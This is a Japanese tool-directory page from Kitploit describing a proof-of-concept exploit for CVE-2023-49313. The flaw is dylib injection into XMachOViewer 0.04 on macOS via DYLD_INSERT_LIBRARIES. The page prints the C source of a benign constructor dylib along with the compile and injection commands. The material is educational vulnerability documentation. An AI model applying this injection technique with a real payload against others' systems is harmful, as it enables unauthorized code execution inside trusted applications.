Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-49313 — XMachOViewer 0.04 における dylib インジェクション脆弱性の概念実証エクスプロイト。macOS 上で DYLD_INSERT_LIBRARIES を介した不正なコード実行を実証します。 | Kitploit
ツール/GitHubGitHub/louiselalanne/cve-2023-49313
エクスプロイト学習と教育ペイロード開発バイナリエクスプロイト
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

XMachOViewer 0.04 における dylib インジェクション脆弱性の概念実証エクスプロイト。macOS 上で DYLD_INSERT_LIBRARIES を介した不正なコード実行を実証します。

リポジトリを見る
412年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-49313

XMachOViewer 0.04 における dylib インジェクションの脆弱性により、攻撃者は整合性を損なう可能性があります。これを悪用すると、不正なコードが製品のプロセスに注入され、リモートコントロールや機密性の高いユーザーデータへの不正アクセスにつながる可能性があります。

Captura de Tela 2023-11-27 às 20 06 48

macOS 用ポータブル版

  • まず、dylib を記述します。
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • コンパイル gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • そして、それを注入します: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

これにより、アプリケーションが起動し、dylib が実行されます。アプリケーションを閉じると、ターミナルに次のように表示されます:

Captura de Tela 2023-11-27 às 19 52 57

  • このトピックの詳細については、次で学習・理解できます: https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
ツールをダウンロード